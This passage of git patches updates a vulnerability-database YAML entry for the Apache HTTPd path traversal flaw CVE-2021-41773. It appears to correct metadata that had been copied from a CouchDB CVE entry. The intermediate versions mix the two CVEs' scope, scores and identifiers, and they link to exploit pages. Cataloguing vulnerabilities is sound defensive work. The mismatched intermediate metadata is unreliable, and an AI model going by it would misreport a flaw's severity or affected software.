monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。 + 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。 scope-of-influence: apache-CouchDB < 3.2.2 reference: -- Gitee From 976832e463a54ca3b628e964ee51e9672dc2b88e Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:02:06 +0000 Subject: [PATCH 28/29] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- .../2021/yaml/CVE-2021-41773.yaml | 18 +++++------------- 1 file changed, 5 insertions(+), 13 deletions(-) diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml index 66d2294f..b9e4b71d 100644 --- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -6,22 +6,14 @@ info: description: 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。 scope-of-influence: - apache-CouchDB < 3.2.2 + Apache HTTP Server = 2.4.49 reference: - - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... - - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... - - http://www.openwall.com/lists/oss-security/2022/04/26/1 - - http://www.openwall.com/lists/oss-security/2022/05/09/1 - - http://www.openwall.com/lists/oss-security/2022/05/09/2 - - http://www.openwall.com/lists/oss-security/2022/05/09/3 - - http://www.openwall.com/lists/oss-security/2022/05/09/4 - - https://docs.couchdb.org/en/3.2.2/setup/cluster.html - - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 - - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... - - https://www.openwall.com/lists/oss-security/2022/04/26/1 + - https://apache.org/ + - https://www.exploit-db.com/exploits/50383 + - https://blog.csdn.net/qq_48985780/article/details/120973100 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 4.3 cve-id: CVE-2022-24706 cwe-id: CWE-1188 cnvd-id: None -- Gitee From e23a8933856f4f0967c5cd152f9d8ffab6bbb2d5 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 07:10:33 +0000 Subject: [PATCH 29/29] update cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml. Signed-off-by: fanyunpeng --- .../2021/yaml/CVE-2021-41773.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml index b9e4b71d..420c8e1a 100644 --- a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml @@ -11,14 +11,17 @@ info: - https://apache.org/ - https://www.exploit-db.com/exploits/50383 - https://blog.csdn.net/qq_48985780/article/details/120973100 + - https://www.oracle.com/security-alerts/cpujan2022.html + - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html + - http://www.openwall.com/lists/oss-security/2021/10/08/1 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 4.3 - cve-id: CVE-2022-24706 - cwe-id: CWE-1188 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-41773 + cwe-id: CWE-22 cnvd-id: None kve-id: None tags: - - 不安全的默认资源初始化 - - 弱口令要求 - - 远程代码执行 \ No newline at end of file + - Apache HTTP Serve + - 路径穿越 + - 任意文件读取 -- Gitee